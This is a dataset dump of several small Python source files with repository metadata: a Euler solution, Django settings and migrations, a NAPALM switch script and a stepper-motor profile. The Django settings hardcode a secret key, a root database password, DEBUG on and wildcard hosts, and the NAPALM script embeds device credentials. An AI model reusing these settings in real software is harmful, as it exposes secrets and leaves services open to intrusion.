blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
281
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
57
| license_type
stringclasses 2
values | repo_name
stringlengths 6
116
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 313
values | visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 18.2k
668M
⌀ | star_events_count
int64 0
102k
| fork_events_count
int64 0
38.2k
| gha_license_id
stringclasses 17
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 107
values | src_encoding
stringclasses 20
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 4
6.02M
| extension
stringclasses 78
values | content
stringlengths 2
6.02M
| authors
listlengths 1
1
| author
stringlengths 0
175
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
ec50df0aa2a320ce0f88bb7eea72f3ddae60e3a7 | 476768e5629340efcbc11fd175c7db12e09c2d52 | /python/006.py | be26addbbddf5f50f6e7fff97a4484130aab1bf1 | []
| no_license | zero1hac/projecteuler | fb8ded5de8d4126865c11081e4b407e0ae35e304 | 7dc00e89c9870d5c7d9c6364f1e80e19d69655e5 | refs/heads/master | 2020-04-23T20:10:51.375485 | 2019-03-25T08:38:59 | 2019-03-25T08:38:59 | 171,430,763 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 155 | py | if __name__ == "__main__":
n = 100
sum_of_squares = (n*(n+1)*(2*n+1))/6
square_of_sum = (n*(n+1)/2)**2
print square_of_sum - sum_of_squares | [
"[email protected]"
]
| |
86d86d506dc4ea99908834b2219f9ecceb083da6 | ad2219bca2bb88604e6dc4b3625b5872f1ae4eff | /Notepad/settings.py | 5605a2d47eb6aae23e97682217dae909223b29f3 | []
| no_license | Abdul-Afeez/notepad | 20c6d25f73812740c6709e52f3a638ac9c8d84fe | 0acfd2961bb29a11e2f97cfeb178e14e18d5a5e3 | refs/heads/master | 2023-08-16T06:08:15.387908 | 2021-09-23T06:20:30 | 2021-09-23T06:20:30 | 408,530,544 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,095 | py | """
Django settings for Notepad project.
Generated by 'django-admin startproject' using Django 2.2.24.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'i(4*c%rg4$9ce*&g-fb&7(!7^aef$%=3^x3hi@(-sfkwep57f+'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['*']
REST_FRAMEWORK = {
'DEFAULT_AUTHENTICATION_CLASSES': (
'rest_framework_simplejwt.authentication.JWTAuthentication',
)
}
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'corsheaders',
'django_mysql',
'rest_framework',
'rest_framework_simplejwt',
'Notepad.owners',
'Notepad.notes',
]
MIDDLEWARE = [
'corsheaders.middleware.CorsMiddleware',
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'Notepad.urls'
CORS_ORIGIN_WHITELIST = (
'http://0.0.0.0:3000',
'http://localhost:3000',
'http://localhost:8000',
'http://18.118.112.37',
'http://18.118.112.37:8000'
)
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'Notepad.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'OPTIONS': {
'read_default_file': '../mysql/my.cnf',
'charset': 'utf8mb4',
},
# Tell Django to build the test database with the 'utf8mb4' character set
'TEST': {
'CHARSET': 'utf8mb4',
'COLLATION': 'utf8mb4_unicode_ci',
},
'NAME': 'note',
'USER': 'root',
'PASSWORD': '123456',
'HOST': 'note_db',
'PORT': 3306,
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
AUTH_USER_MODEL = 'owners.Owner'
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
SESSION_TIMEOUT = 60
| [
"[email protected]"
]
| |
4a1bb31236fc9773fb0e6894d55116aa1e9934d8 | 3eeedc6a5a9d31c5fff5d06ef2c659147ae27fec | /users/migrations/0025_auto_20190705_2137.py | 964d4ad9e73d3a9c5f127b9ccbc37afb649ad016 | []
| no_license | aahmedsamy/special_offer | 2ef284e7a9a759f79e150adfd7c18625ec4c1b8c | 384efad727f80aa4d9452485c3b5899abc3d39cb | refs/heads/master | 2022-03-08T22:42:07.040004 | 2019-07-21T20:57:55 | 2019-07-21T20:57:55 | 181,128,711 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 448 | py | # Generated by Django 2.2 on 2019-07-05 17:37
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('users', '0024_auto_20190705_2112'),
]
operations = [
migrations.AlterModelOptions(
name='advertisernotification',
options={'ordering': ['-id'], 'verbose_name': 'AdvertiserNotification', 'verbose_name_plural': 'AdvertiserNotifications'},
),
]
| [
"[email protected]"
]
| |
fbc3cb3337489cd49a68c2578139f993cb3822c4 | a0083584308a52b045550dbe76007e2467b7e40f | /pythonvideos/napalm_mac_Address.py | f7338f62e722e668b8d2dd285552ab03e44f5a7b | []
| no_license | narkalya/git-demo | ac511391a2c8026d53215262202b924a220ded0b | abffcdf9e0d1afd15742bfdd45784423eb04d4ab | refs/heads/master | 2020-03-25T08:58:49.356341 | 2018-08-06T15:09:25 | 2018-08-06T15:09:25 | 143,641,171 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 286 | py | from napalm import get_network_driver
driver = get_network_driver('ios')
iosvl2 = driver('192.168.122.72', 'david', 'cisco')
iosvl2.open()
print iosvl2.get_facts()
ios_output = iosvl2.get_mac_address_table()
print (json.dumps(ios_output, sort_keys=True, indent=4))
iosvl2.close()
| [
"[email protected]"
]
| |
838994d7fee7f1ec6d0ab6addde154ea89e34fc1 | df1ad0d061f7982edd0d5e159a1abc31daa8fd4c | /MapApp/migrations/0004_registerview.py | f535de1806e149f392a7e4d785b7132cf36a7735 | [
"Apache-2.0"
]
| permissive | todor943/mapEngine | f6c056ca1b2fcf6207d5a1bf2b5908f062fff353 | 560c4e9bee2ef20e988124030db801337d8722f1 | refs/heads/master | 2020-12-24T18:55:13.667780 | 2017-11-06T19:54:04 | 2017-11-06T19:54:04 | 57,469,622 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,065 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.5 on 2017-10-02 22:32
from __future__ import unicode_literals
import django.contrib.auth.models
import django.contrib.auth.validators
from django.db import migrations, models
import django.utils.timezone
import django.views.generic.base
class Migration(migrations.Migration):
dependencies = [
('auth', '0008_alter_user_username_max_length'),
('MapApp', '0003_auto_20171002_1846'),
]
operations = [
migrations.CreateModel(
name='RegisterView',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('password', models.CharField(max_length=128, verbose_name='password')),
('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),
('username', models.CharField(error_messages={'unique': 'A user with that username already exists.'}, help_text='Required. 150 characters or fewer. Letters, digits and @/./+/-/_ only.', max_length=150, unique=True, validators=[django.contrib.auth.validators.UnicodeUsernameValidator()], verbose_name='username')),
('first_name', models.CharField(blank=True, max_length=30, verbose_name='first name')),
('last_name', models.CharField(blank=True, max_length=30, verbose_name='last name')),
('email', models.EmailField(blank=True, max_length=254, verbose_name='email address')),
('is_staff', models.BooleanField(default=False, help_text='Designates whether the user can log into this admin site.', verbose_name='staff status')),
('is_active', models.BooleanField(default=True, help_text='Designates whether this user should be treated as active. Unselect this instead of deleting accounts.', verbose_name='active')),
('date_joined', models.DateTimeField(default=django.utils.timezone.now, verbose_name='date joined')),
('groups', models.ManyToManyField(blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', related_name='user_set', related_query_name='user', to='auth.Group', verbose_name='groups')),
('user_permissions', models.ManyToManyField(blank=True, help_text='Specific permissions for this user.', related_name='user_set', related_query_name='user', to='auth.Permission', verbose_name='user permissions')),
],
options={
'verbose_name': 'user',
'verbose_name_plural': 'users',
'abstract': False,
},
bases=(models.Model, django.views.generic.base.View),
managers=[
('objects', django.contrib.auth.models.UserManager()),
],
),
]
| [
"[email protected]"
]
| |
6ac793e3b8df59989fc5a148e4385b6fe3b6ed70 | dbab24ee5055dad1a57bb212ae30da994022eab5 | /Python/Chapter 6 - tehtävä 3.py | 4703757b6f12df00e86114119c5ffd8b7220709e | []
| no_license | MikBom/mikbom-github.io | e8ab24080a6c6383f4ad973a817e10ab84375e4f | 3dc7312798473a7620529d24fa771d5b09bafbbc | refs/heads/main | 2023-08-14T07:04:01.427822 | 2021-09-21T16:08:32 | 2021-09-21T16:08:32 | 301,965,605 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 193 | py | vari = input("Valitse kohde (1-3):")
if vari == "1":
print("Haukion Kala Oy")
elif vari == "2":
print("Metallipaja VasaraAika")
elif vari == "3":
print("Balin palapelitehdas") | [
"[email protected]"
]
| |
e3de38465362031a14aa2ff4b827877b72f76780 | 60de13f814ebfff48740b693563bf4b83096534d | /venv/Scripts/pip-script.py | ee13259c85c9b690ddae6a5c5196f921bda9b1ed | []
| no_license | Daria8402/bandurova17ov1 | 1c568d41b64fa3c1093193fb78b6c5c15a569cd7 | 5b202d32a4b2707664615b7d9d98f4c77efa9622 | refs/heads/master | 2021-02-18T12:12:56.944287 | 2020-03-05T15:43:51 | 2020-03-05T15:43:51 | 245,193,981 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 382 | py | #!D:\GitHub\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==19.0.3','console_scripts','pip'
__requires__ = 'pip==19.0.3'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==19.0.3', 'console_scripts', 'pip')()
)
| [
"[email protected]"
]
| |
547125bf7f5eb3fd28b9773a2c0f621cc581f51f | 5087f23a7d11be7580b6f0e3d8bc434ff0451c05 | /lambda.py | 09b30ea8d1db850cf24c3624943f654d851a2c87 | [
"MIT"
]
| permissive | ShanmukhaSrinivas/python-75-hackathon | b07c35fea469c8fbc8769d02d3bb63d6af93cafc | 57eafed31d84ac09079ba9bcbaa9263d79996313 | refs/heads/master | 2020-04-11T10:51:15.137518 | 2019-12-13T07:55:52 | 2019-12-13T07:55:52 | 161,728,454 | 0 | 0 | MIT | 2018-12-14T03:47:44 | 2018-12-14T03:47:44 | null | UTF-8 | Python | false | false | 146 | py | # labmda function that returns a test number is even or not
f = lambda x: 'Even' if x%2==0 else 'Odd'
print(f(int(input('Enter a number \n')))) | [
"[email protected]"
]
| |
f1c36c2f5193255fecfcd93b9edf3e5806fbce99 | b6639af28745c7cee140b4d76332c937557df0dd | /python/lab3.1.py | 6163a99e1effe76fb1ae315e913cedbbb33a0dc5 | []
| no_license | ston1x/uni | a9ef682115ef50994012a887a1a62ec0d8dc90ee | 8062f9f1d0beeddabe74cbbf672ca68d7ac626ec | refs/heads/master | 2020-09-22T02:35:04.927509 | 2020-02-24T07:14:14 | 2020-02-24T07:14:14 | 225,019,033 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 389 | py | def string_to_words(string, separator):
try:
return string.split(separator)
except Exception as e:
print(e)
try:
string = input("Enter the string divided by a separator: ")
separator= input("Enter the character by which the string will be splitted (separator): ")
except Exception as e:
print(e)
words = string_to_words(string, separator)
print(words)
| [
"[email protected]"
]
| |
ef82571b3a9d413818632a92cb1e3edb2d75dab3 | 385a63d3c9e6f5815979165001f78ec3d7b90cd2 | /DrivingTDM_SetupMatlabOOP/headerAndFunctionsMotor/ximc/python-profiles/STANDA/8MT195X-540-4.py | 391e7db3d811458155873424999b6ceb86b43093 | [
"BSD-2-Clause"
]
| permissive | Rasedujjaman/matlabOOP | 5abb6ec94998fda5e9214ed94cf67a42bf243d4f | e1f025ab9b00a3646719df23852079736d2b5701 | refs/heads/main | 2023-07-23T21:40:53.905045 | 2021-08-31T16:12:39 | 2021-08-31T16:12:39 | 378,249,559 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 22,654 | py | def set_profile_8MT195X_540_4(lib, id):
worst_result = Result.Ok
result = Result.Ok
feedback_settings = feedback_settings_t()
feedback_settings.IPS = 4000
class FeedbackType_:
FEEDBACK_ENCODER_MEDIATED = 6
FEEDBACK_NONE = 5
FEEDBACK_EMF = 4
FEEDBACK_ENCODER = 1
feedback_settings.FeedbackType = FeedbackType_.FEEDBACK_EMF
class FeedbackFlags_:
FEEDBACK_ENC_TYPE_BITS = 192
FEEDBACK_ENC_TYPE_DIFFERENTIAL = 128
FEEDBACK_ENC_TYPE_SINGLE_ENDED = 64
FEEDBACK_ENC_REVERSE = 1
FEEDBACK_ENC_TYPE_AUTO = 0
feedback_settings.FeedbackFlags = FeedbackFlags_.FEEDBACK_ENC_TYPE_SINGLE_ENDED | FeedbackFlags_.FEEDBACK_ENC_TYPE_AUTO
feedback_settings.CountsPerTurn = 4000
result = lib.set_feedback_settings(id, byref(feedback_settings))
if result != Result.Ok:
if worst_result == Result.Ok or worst_result == Result.ValueError:
worst_result = result
home_settings = home_settings_t()
home_settings.FastHome = 500
home_settings.uFastHome = 0
home_settings.SlowHome = 500
home_settings.uSlowHome = 0
home_settings.HomeDelta = 500
home_settings.uHomeDelta = 0
class HomeFlags_:
HOME_USE_FAST = 256
HOME_STOP_SECOND_BITS = 192
HOME_STOP_SECOND_LIM = 192
HOME_STOP_SECOND_SYN = 128
HOME_STOP_SECOND_REV = 64
HOME_STOP_FIRST_BITS = 48
HOME_STOP_FIRST_LIM = 48
HOME_STOP_FIRST_SYN = 32
HOME_STOP_FIRST_REV = 16
HOME_HALF_MV = 8
HOME_MV_SEC_EN = 4
HOME_DIR_SECOND = 2
HOME_DIR_FIRST = 1
home_settings.HomeFlags = HomeFlags_.HOME_USE_FAST | HomeFlags_.HOME_STOP_SECOND_REV | HomeFlags_.HOME_STOP_FIRST_BITS | HomeFlags_.HOME_DIR_SECOND
result = lib.set_home_settings(id, byref(home_settings))
if result != Result.Ok:
if worst_result == Result.Ok or worst_result == Result.ValueError:
worst_result = result
move_settings = move_settings_t()
move_settings.Speed = 1000
move_settings.uSpeed = 0
move_settings.Accel = 2000
move_settings.Decel = 4000
move_settings.AntiplaySpeed = 1000
move_settings.uAntiplaySpeed = 0
class MoveFlags_:
RPM_DIV_1000 = 1
result = lib.set_move_settings(id, byref(move_settings))
if result != Result.Ok:
if worst_result == Result.Ok or worst_result == Result.ValueError:
worst_result = result
engine_settings = engine_settings_t()
engine_settings.NomVoltage = 1
engine_settings.NomCurrent = 2100
engine_settings.NomSpeed = 2000
engine_settings.uNomSpeed = 0
class EngineFlags_:
ENGINE_LIMIT_RPM = 128
ENGINE_LIMIT_CURR = 64
ENGINE_LIMIT_VOLT = 32
ENGINE_ACCEL_ON = 16
ENGINE_ANTIPLAY = 8
ENGINE_MAX_SPEED = 4
ENGINE_CURRENT_AS_RMS = 2
ENGINE_REVERSE = 1
engine_settings.EngineFlags = EngineFlags_.ENGINE_LIMIT_RPM | EngineFlags_.ENGINE_ACCEL_ON | EngineFlags_.ENGINE_REVERSE
engine_settings.Antiplay = 575
class MicrostepMode_:
MICROSTEP_MODE_FRAC_256 = 9
MICROSTEP_MODE_FRAC_128 = 8
MICROSTEP_MODE_FRAC_64 = 7
MICROSTEP_MODE_FRAC_32 = 6
MICROSTEP_MODE_FRAC_16 = 5
MICROSTEP_MODE_FRAC_8 = 4
MICROSTEP_MODE_FRAC_4 = 3
MICROSTEP_MODE_FRAC_2 = 2
MICROSTEP_MODE_FULL = 1
engine_settings.MicrostepMode = MicrostepMode_.MICROSTEP_MODE_FRAC_256
engine_settings.StepsPerRev = 200
result = lib.set_engine_settings(id, byref(engine_settings))
if result != Result.Ok:
if worst_result == Result.Ok or worst_result == Result.ValueError:
worst_result = result
entype_settings = entype_settings_t()
class EngineType_:
ENGINE_TYPE_BRUSHLESS = 5
ENGINE_TYPE_TEST = 4
ENGINE_TYPE_STEP = 3
ENGINE_TYPE_2DC = 2
ENGINE_TYPE_DC = 1
ENGINE_TYPE_NONE = 0
entype_settings.EngineType = EngineType_.ENGINE_TYPE_STEP | EngineType_.ENGINE_TYPE_NONE
class DriverType_:
DRIVER_TYPE_EXTERNAL = 3
DRIVER_TYPE_INTEGRATE = 2
DRIVER_TYPE_DISCRETE_FET = 1
entype_settings.DriverType = DriverType_.DRIVER_TYPE_INTEGRATE
result = lib.set_entype_settings(id, byref(entype_settings))
if result != Result.Ok:
if worst_result == Result.Ok or worst_result == Result.ValueError:
worst_result = result
power_settings = power_settings_t()
power_settings.HoldCurrent = 50
power_settings.CurrReductDelay = 1000
power_settings.PowerOffDelay = 60
power_settings.CurrentSetTime = 300
class PowerFlags_:
POWER_SMOOTH_CURRENT = 4
POWER_OFF_ENABLED = 2
POWER_REDUCT_ENABLED = 1
power_settings.PowerFlags = PowerFlags_.POWER_SMOOTH_CURRENT | PowerFlags_.POWER_OFF_ENABLED | PowerFlags_.POWER_REDUCT_ENABLED
result = lib.set_power_settings(id, byref(power_settings))
if result != Result.Ok:
if worst_result == Result.Ok or worst_result == Result.ValueError:
worst_result = result
secure_settings = secure_settings_t()
secure_settings.LowUpwrOff = 800
secure_settings.CriticalIpwr = 4000
secure_settings.CriticalUpwr = 5500
secure_settings.CriticalT = 800
secure_settings.CriticalIusb = 450
secure_settings.CriticalUusb = 520
secure_settings.MinimumUusb = 420
class Flags_:
ALARM_ENGINE_RESPONSE = 128
ALARM_WINDING_MISMATCH = 64
USB_BREAK_RECONNECT = 32
ALARM_FLAGS_STICKING = 16
ALARM_ON_BORDERS_SWAP_MISSET = 8
H_BRIDGE_ALERT = 4
LOW_UPWR_PROTECTION = 2
ALARM_ON_DRIVER_OVERHEATING = 1
secure_settings.Flags = Flags_.ALARM_ENGINE_RESPONSE | Flags_.ALARM_FLAGS_STICKING | Flags_.ALARM_ON_BORDERS_SWAP_MISSET | Flags_.H_BRIDGE_ALERT | Flags_.ALARM_ON_DRIVER_OVERHEATING
result = lib.set_secure_settings(id, byref(secure_settings))
if result != Result.Ok:
if worst_result == Result.Ok or worst_result == Result.ValueError:
worst_result = result
edges_settings = edges_settings_t()
class BorderFlags_:
BORDERS_SWAP_MISSET_DETECTION = 8
BORDER_STOP_RIGHT = 4
BORDER_STOP_LEFT = 2
BORDER_IS_ENCODER = 1
edges_settings.BorderFlags = BorderFlags_.BORDER_STOP_RIGHT | BorderFlags_.BORDER_STOP_LEFT
class EnderFlags_:
ENDER_SW2_ACTIVE_LOW = 4
ENDER_SW1_ACTIVE_LOW = 2
ENDER_SWAP = 1
edges_settings.EnderFlags = EnderFlags_.ENDER_SWAP
edges_settings.LeftBorder = 175
edges_settings.uLeftBorder = 0
edges_settings.RightBorder = 25825
edges_settings.uRightBorder = 0
result = lib.set_edges_settings(id, byref(edges_settings))
if result != Result.Ok:
if worst_result == Result.Ok or worst_result == Result.ValueError:
worst_result = result
pid_settings = pid_settings_t()
pid_settings.KpU = 0
pid_settings.KiU = 0
pid_settings.KdU = 0
pid_settings.Kpf = 0.003599999938160181
pid_settings.Kif = 0.03799999877810478
pid_settings.Kdf = 2.8000000384054147e-05
result = lib.set_pid_settings(id, byref(pid_settings))
if result != Result.Ok:
if worst_result == Result.Ok or worst_result == Result.ValueError:
worst_result = result
sync_in_settings = sync_in_settings_t()
class SyncInFlags_:
SYNCIN_GOTOPOSITION = 4
SYNCIN_INVERT = 2
SYNCIN_ENABLED = 1
sync_in_settings.ClutterTime = 4
sync_in_settings.Position = 0
sync_in_settings.uPosition = 0
sync_in_settings.Speed = 0
sync_in_settings.uSpeed = 0
result = lib.set_sync_in_settings(id, byref(sync_in_settings))
if result != Result.Ok:
if worst_result == Result.Ok or worst_result == Result.ValueError:
worst_result = result
sync_out_settings = sync_out_settings_t()
class SyncOutFlags_:
SYNCOUT_ONPERIOD = 64
SYNCOUT_ONSTOP = 32
SYNCOUT_ONSTART = 16
SYNCOUT_IN_STEPS = 8
SYNCOUT_INVERT = 4
SYNCOUT_STATE = 2
SYNCOUT_ENABLED = 1
sync_out_settings.SyncOutFlags = SyncOutFlags_.SYNCOUT_ONSTOP | SyncOutFlags_.SYNCOUT_ONSTART
sync_out_settings.SyncOutPulseSteps = 100
sync_out_settings.SyncOutPeriod = 2000
sync_out_settings.Accuracy = 0
sync_out_settings.uAccuracy = 0
result = lib.set_sync_out_settings(id, byref(sync_out_settings))
if result != Result.Ok:
if worst_result == Result.Ok or worst_result == Result.ValueError:
worst_result = result
extio_settings = extio_settings_t()
class EXTIOSetupFlags_:
EXTIO_SETUP_INVERT = 2
EXTIO_SETUP_OUTPUT = 1
extio_settings.EXTIOSetupFlags = EXTIOSetupFlags_.EXTIO_SETUP_OUTPUT
class EXTIOModeFlags_:
EXTIO_SETUP_MODE_OUT_BITS = 240
EXTIO_SETUP_MODE_OUT_MOTOR_ON = 64
EXTIO_SETUP_MODE_OUT_ALARM = 48
EXTIO_SETUP_MODE_OUT_MOVING = 32
EXTIO_SETUP_MODE_OUT_ON = 16
EXTIO_SETUP_MODE_IN_BITS = 15
EXTIO_SETUP_MODE_IN_ALARM = 5
EXTIO_SETUP_MODE_IN_HOME = 4
EXTIO_SETUP_MODE_IN_MOVR = 3
EXTIO_SETUP_MODE_IN_PWOF = 2
EXTIO_SETUP_MODE_IN_STOP = 1
EXTIO_SETUP_MODE_IN_NOP = 0
EXTIO_SETUP_MODE_OUT_OFF = 0
extio_settings.EXTIOModeFlags = EXTIOModeFlags_.EXTIO_SETUP_MODE_IN_STOP | EXTIOModeFlags_.EXTIO_SETUP_MODE_IN_NOP | EXTIOModeFlags_.EXTIO_SETUP_MODE_OUT_OFF
result = lib.set_extio_settings(id, byref(extio_settings))
if result != Result.Ok:
if worst_result == Result.Ok or worst_result == Result.ValueError:
worst_result = result
brake_settings = brake_settings_t()
brake_settings.t1 = 300
brake_settings.t2 = 500
brake_settings.t3 = 300
brake_settings.t4 = 400
class BrakeFlags_:
BRAKE_ENG_PWROFF = 2
BRAKE_ENABLED = 1
brake_settings.BrakeFlags = BrakeFlags_.BRAKE_ENG_PWROFF
result = lib.set_brake_settings(id, byref(brake_settings))
if result != Result.Ok:
if worst_result == Result.Ok or worst_result == Result.ValueError:
worst_result = result
control_settings = control_settings_t()
control_settings.MaxSpeed[0] = 100
control_settings.MaxSpeed[1] = 1000
control_settings.MaxSpeed[2] = 0
control_settings.MaxSpeed[3] = 0
control_settings.MaxSpeed[4] = 0
control_settings.MaxSpeed[5] = 0
control_settings.MaxSpeed[6] = 0
control_settings.MaxSpeed[7] = 0
control_settings.MaxSpeed[8] = 0
control_settings.MaxSpeed[9] = 0
control_settings.uMaxSpeed[0] = 0
control_settings.uMaxSpeed[1] = 0
control_settings.uMaxSpeed[2] = 0
control_settings.uMaxSpeed[3] = 0
control_settings.uMaxSpeed[4] = 0
control_settings.uMaxSpeed[5] = 0
control_settings.uMaxSpeed[6] = 0
control_settings.uMaxSpeed[7] = 0
control_settings.uMaxSpeed[8] = 0
control_settings.uMaxSpeed[9] = 0
control_settings.Timeout[0] = 1000
control_settings.Timeout[1] = 1000
control_settings.Timeout[2] = 1000
control_settings.Timeout[3] = 1000
control_settings.Timeout[4] = 1000
control_settings.Timeout[5] = 1000
control_settings.Timeout[6] = 1000
control_settings.Timeout[7] = 1000
control_settings.Timeout[8] = 1000
control_settings.MaxClickTime = 300
class Flags_:
CONTROL_BTN_RIGHT_PUSHED_OPEN = 8
CONTROL_BTN_LEFT_PUSHED_OPEN = 4
CONTROL_MODE_BITS = 3
CONTROL_MODE_LR = 2
CONTROL_MODE_JOY = 1
CONTROL_MODE_OFF = 0
control_settings.Flags = Flags_.CONTROL_MODE_LR | Flags_.CONTROL_MODE_OFF
control_settings.DeltaPosition = 1
control_settings.uDeltaPosition = 0
result = lib.set_control_settings(id, byref(control_settings))
if result != Result.Ok:
if worst_result == Result.Ok or worst_result == Result.ValueError:
worst_result = result
joystick_settings = joystick_settings_t()
joystick_settings.JoyLowEnd = 0
joystick_settings.JoyCenter = 5000
joystick_settings.JoyHighEnd = 10000
joystick_settings.ExpFactor = 100
joystick_settings.DeadZone = 50
class JoyFlags_:
JOY_REVERSE = 1
result = lib.set_joystick_settings(id, byref(joystick_settings))
if result != Result.Ok:
if worst_result == Result.Ok or worst_result == Result.ValueError:
worst_result = result
ctp_settings = ctp_settings_t()
ctp_settings.CTPMinError = 3
class CTPFlags_:
CTP_ERROR_CORRECTION = 16
REV_SENS_INV = 8
CTP_ALARM_ON_ERROR = 4
CTP_BASE = 2
CTP_ENABLED = 1
ctp_settings.CTPFlags = CTPFlags_.CTP_ERROR_CORRECTION
result = lib.set_ctp_settings(id, byref(ctp_settings))
if result != Result.Ok:
if worst_result == Result.Ok or worst_result == Result.ValueError:
worst_result = result
uart_settings = uart_settings_t()
uart_settings.Speed = 115200
class UARTSetupFlags_:
UART_STOP_BIT = 8
UART_PARITY_BIT_USE = 4
UART_PARITY_BITS = 3
UART_PARITY_BIT_MARK = 3
UART_PARITY_BIT_SPACE = 2
UART_PARITY_BIT_ODD = 1
UART_PARITY_BIT_EVEN = 0
uart_settings.UARTSetupFlags = UARTSetupFlags_.UART_PARITY_BIT_EVEN
result = lib.set_uart_settings(id, byref(uart_settings))
if result != Result.Ok:
if worst_result == Result.Ok or worst_result == Result.ValueError:
worst_result = result
controller_name = controller_name_t()
controller_name.ControllerName = bytes([0, 113, 252, 118, 36, 0, 72, 0, 3, 0, 0, 0, 104, 101, 103, 0])
class CtrlFlags_:
EEPROM_PRECEDENCE = 1
result = lib.set_controller_name(id, byref(controller_name))
if result != Result.Ok:
if worst_result == Result.Ok or worst_result == Result.ValueError:
worst_result = result
emf_settings = emf_settings_t()
emf_settings.L = 0.013000000268220901
emf_settings.R = 2.5999999046325684
emf_settings.Km = 0.015599999576807022
class BackEMFFlags_:
BACK_EMF_KM_AUTO = 4
BACK_EMF_RESISTANCE_AUTO = 2
BACK_EMF_INDUCTANCE_AUTO = 1
result = lib.set_emf_settings(id, byref(emf_settings))
if result != Result.Ok:
if worst_result == Result.Ok or worst_result == Result.ValueError:
worst_result = result
engine_advansed_setup = engine_advansed_setup_t()
engine_advansed_setup.stepcloseloop_Kw = 50
engine_advansed_setup.stepcloseloop_Kp_low = 1000
engine_advansed_setup.stepcloseloop_Kp_high = 33
result = lib.set_engine_advansed_setup(id, byref(engine_advansed_setup))
if result != Result.Ok:
if worst_result == Result.Ok or worst_result == Result.ValueError:
worst_result = result
extended_settings = extended_settings_t()
extended_settings.Param1 = 0
result = lib.set_extended_settings(id, byref(extended_settings))
if result != Result.Ok:
if worst_result == Result.Ok or worst_result == Result.ValueError:
worst_result = result
stage_name = stage_name_t()
stage_name.PositionerName = bytes([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0])
result = lib.set_stage_name(id, byref(stage_name))
if result != Result.Ok:
if worst_result == Result.Ok or worst_result == Result.ValueError:
worst_result = result
stage_information = stage_information_t()
stage_information.Manufacturer = bytes([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0])
stage_information.PartNumber = bytes([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0])
result = lib.set_stage_information(id, byref(stage_information))
if result != Result.Ok:
if worst_result == Result.Ok or worst_result == Result.ValueError:
worst_result = result
stage_settings = stage_settings_t()
stage_settings.LeadScrewPitch = 0
stage_settings.Units = bytes([0, 0, 0, 0, 0, 0, 0, 0])
stage_settings.MaxSpeed = 0
stage_settings.TravelRange = 0
